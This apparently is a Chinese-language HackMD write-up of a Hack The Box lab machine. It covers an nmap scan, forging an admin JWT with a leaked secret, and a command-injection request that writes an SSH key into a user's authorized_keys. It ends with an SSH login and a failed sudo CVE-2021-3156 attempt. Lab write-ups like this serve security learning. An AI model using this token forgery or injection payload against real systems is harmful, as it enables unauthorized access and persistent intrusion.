~$ sudo nmap -sS -A -sC -sV -p- --min-rate 5000 10.10.11.120
Nmap scan report for 10.10.11.120
Host is up (0.40s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 97:af:61:44:10:89:b9:53:f0:80:3f:d7:19:b1:e2:9c (RSA)
| 256 95:ed:65:8d:cd:08:2b:55:dd:17:51:31:1e:3e:18:12 (ECDSA)
|_ 256 33:7b:c1:71:d3:33:0f:92:4e:83:5a:1f:52:02:93:5e (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: DUMB Docs
|_http-server-header: nginx/1.18.0 (Ubuntu)
3000/tcp open http Node.js (Express middleware)
|_http-title: DUMB Docs
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=3/17%OT=22%CT=1%CU=44381%PV=Y%DS=2%DC=T%G=Y%TM=62332FE
OS:0%P=x86_64-pc-linux-gnu)SEQ(SP=FA%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%TS=A)OPS(
OS:O1=M505ST11NW7%O2=M505ST11NW7%O3=M505NNT11NW7%O4=M505ST11NW7%O5=M505ST11
OS:NW7%O6=M505ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(
OS:R=Y%DF=Y%T=40%W=FAF0%O=M505NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS
OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=
OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T
OS:=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=
OS:S)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 256/tcp)
HOP RTT ADDRESS
1 397.90 ms 10.10.14.1
2 397.73 ms 10.10.11.120
Stats: 0:01:12 elapsed; 1 hosts completed (1 up), 0 undergoing Script Post-Scan
NSE Timing: About 0.00% done
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 72.82 seconds
auth-token
header 傳送 jwt token,該 token 用環境變數 TOKEN_SECRET
作為 jwt keyTOKEN_SECRET
,移除後並未修改,使用該 key 得到 theadmin jwt
> const TOKEN_SECRET='gXr67TtoQL8TShUc8XYsK2HvsBYfyQSFCFZe4MQp7gRpFuMkKjcM72CNQN4fMfbZEKx4i7YiWuNAkmuTcdEriCMm9vPAYkhpwPTiuVwVhvwE'
undefined
> const jwt = require('jsonwebtoken')
undefined
> jwt.sign({ _id: '123', name: 'theadmin' , email:'aa'}, TOKEN_SECRET )
'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiIxMjMiLCJuYW1lIjoidGhlYWRtaW4iLCJlbWFpbCI6ImFhIiwiaWF0IjoxNjQ3NTIyOTM1fQ.mAAgzJjzJ8eSdMNTjzh4RwfYS4TUFmS3uCMwxjuGObA'
~/.ssh/authorized_keys
GET /api/logs?file=index.js%3becho%20'ssh-rsa%20AAAAB3NzaC1yc2EAAAADAQABAAABgQDuXAKp6lilCgdGpsrip1Zx8Ex%2bwC8Y9OlElgzsCs2gyh2RleVA26cwq2uLwF%2bO4lVtLunxGbvcN97gCVKb%2bEstkjSRmMkhCrmb7hRO3mvvul770f2333iMcd4xtQCTBXbYjdFdR7IQAp8p9iSrYUeyU%2fLnKMFeboKRY4kFhIuSvavy5mflJalTKq%2bBhGZd3DCKHk%2bcbH4FLcoMy9hTy3Js%2bzaw28Td%2bLo4oTm2LP%2fW2w%2fwopgCy5FWv531udIYT8AQxX47IOSloRqOeRfyX3SV9jdXVv0AutPq1REykxW14Clv2xbR%2fddQfcCmbMBSp8lXpR%2btkhDNdk82rawaX7HJMmJAY%2bg%2fQEgoEePOEfppawCsFwdzTdAoTCU2kfl6CNx3rB%2bF9CAP8Twgom5Mt%2flYPi2N%2fZEhRo2OCK9Sx5PZx79UAHnO0WeQc5BWeUYJrBacBuvnaFCejcJHFP5LNti5xMI1FvmNMwlFO7%2bPsmIZnZfSxbhg9FP%2fy1ixD3eoymk%3d%20eethan1%40Magdalene2'%20%3e%20%2fhome%2fdasith%2f.ssh%2fauthorized_keys HTTP/1.1
auth-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiIxMjMiLCJuYW1lIjoidGhlYWRtaW4iLCJlbWFpbCI6ImFhIiwiaWF0IjoxNjQ3NTIyOTM1fQ.mAAgzJjzJ8eSdMNTjzh4RwfYS4TUFmS3uCMwxjuGObA
Host: 10.10.11.120:3000
ssh -i ~/tmp/id_rsa dasith@10.10.11.120
linpeas.sh
顯示使用 Sudo version 1.8.31 有 CVE-2021-3156 ,試了一下 https://github.com/mohinparamasivam/Sudo-1.8.31-Root-Exploit 沒成功,README 上有特別標註用 sudoedit 判別是不是可以 exploit,試了後是不行 exploit:::spoiler TOC ::: Spec & source code refhttps://blog.huli.tw/2022/04/24/script-type/ sourcegraph: search source code chromium source code
Feb 5, 2025:::spoiler TOC ::: 工具 jsbin: 快速測試 HTML Living Standar - 8 Web application APIs multipage 和 one-page 內容有出入
Feb 5, 2025:::spoiler TOC ::: :::spoiler 待整理 [ ] http://www.madchat.fr/coding/php/secu/ ::: PHP
Jan 15, 2025SQL Injection :::spoiler 目錄 ::: PayloadsAllTheThings/SQL Injection sqlmap usage mssqlserver
Aug 26, 2024or
By clicking below, you agree to our terms of service.
New to HackMD? Sign up